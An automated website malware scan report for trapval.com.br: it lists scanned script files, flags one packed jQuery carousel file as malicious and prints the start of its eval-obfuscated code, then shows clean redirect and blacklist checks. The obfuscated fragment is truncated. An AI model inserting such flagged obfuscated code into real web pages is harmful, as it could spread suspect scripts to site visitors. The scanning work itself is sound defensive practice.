Scanned pages/files
Request | Server response | Status |
http://www.trapval.com.br/ | 200 OK Content-Length: 73232 Content-Type: text/html | clean |
http://www.trapval.com.br/javascripts/jquery.js | 200 OK Content-Length: 265218 Content-Type: application/javascript | clean |
http://www.trapval.com.br/javascripts/foundation.min.js | 200 OK Content-Length: 158139 Content-Type: application/javascript | clean |
http://www.trapval.com.br/javascripts/modernizr.foundation.js | 200 OK Content-Length: 9288 Content-Type: application/javascript | clean |
http://www.trapval.com.br/plugins/slider-revolution/jquery.themepunch.plugins.min.js | 200 OK Content-Length: 16203 Content-Type: application/javascript | clean |
http://www.trapval.com.br/plugins/slider-revolution/jquery.themepunch.revolution.min.js | 200 OK Content-Length: 52558 Content-Type: application/javascript | clean |
http://www.trapval.com.br/javascripts/jquery.tipsy.js | 200 OK Content-Length: 9787 Content-Type: application/javascript | clean |
http://www.trapval.com.br/javascripts/jquery.carouFredSel-6.0.3-packed.js | 200 OK Content-Length: 36095 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(C($){8($.1r.1v){G}$.1r.6o=$.1r.1v=C(u,w){8(1k.S==0){18(I,\'6p 53 7P 1j "\'+1k.4k+\'".\');G 1k}8(1k.S>1){G 1k.1W(C(){$(1k).1v(u,w)})}E y=1k,$14=1k[0],54=K;8(y.1p(\'5 Antivirus reports:
| ||
http://www.trapval.com.br/javascripts/jquery.touchSwipe.min.js | 200 OK Content-Length: 4313 Content-Type: application/javascript | clean |
http://www.trapval.com.br/plugins/titan/js/prettify.js | 200 OK Content-Length: 13632 Content-Type: application/javascript | clean |
http://www.trapval.com.br/plugins/titan/js/jquery.titanlighbox.js | 200 OK Content-Length: 36418 Content-Type: application/javascript | clean |
http://www.trapval.com.br/javascripts/jquery.jtweetsanywhere-1.3.1.min.js | 200 OK Content-Length: 30934 Content-Type: application/javascript | clean |
http://www.trapval.com.br/javascripts/app-head.js | 200 OK Content-Length: 4385 Content-Type: application/javascript | clean |
http://www.trapval.com.br/javascripts/app.js | 200 OK Content-Length: 3955 Content-Type: application/javascript | clean |
http://www.trapval.com.br/index.php | 200 OK Content-Length: 73232 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: trapval.com.br
Result:
GET / HTTP/1.1
Host: trapval.com.br
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: trapval.com.br
Referer: http://www.google.com/search?q=trapval.com.br
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: trapval.com.br
Referer: http://www.google.com/search?q=trapval.com.br
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=trapval.com.br
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://trapval.com.br/
Result: trapval.com.br is not infected or malware details are not published yet.
Result: trapval.com.br is not infected or malware details are not published yet.